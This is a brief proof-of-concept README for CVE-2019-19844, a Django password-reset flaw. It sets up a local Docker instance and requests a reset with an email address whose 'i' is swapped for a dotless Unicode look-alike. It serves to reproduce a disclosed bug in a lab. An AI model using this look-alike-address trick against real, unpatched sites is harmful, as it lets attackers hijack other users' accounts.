PoC for CVE-2019-19844
- docker-compose run --service-ports web python manage.py migrate --no-input
- docker-compose run --service-ports web python manage.py createsuperuser --email=me@0xsha.io --username 0xsha
- Head on to localhost:8000/accounts/password-reset
- me@0xsha.ıo and hit enter (Note that "i" is malformed)
- Check the console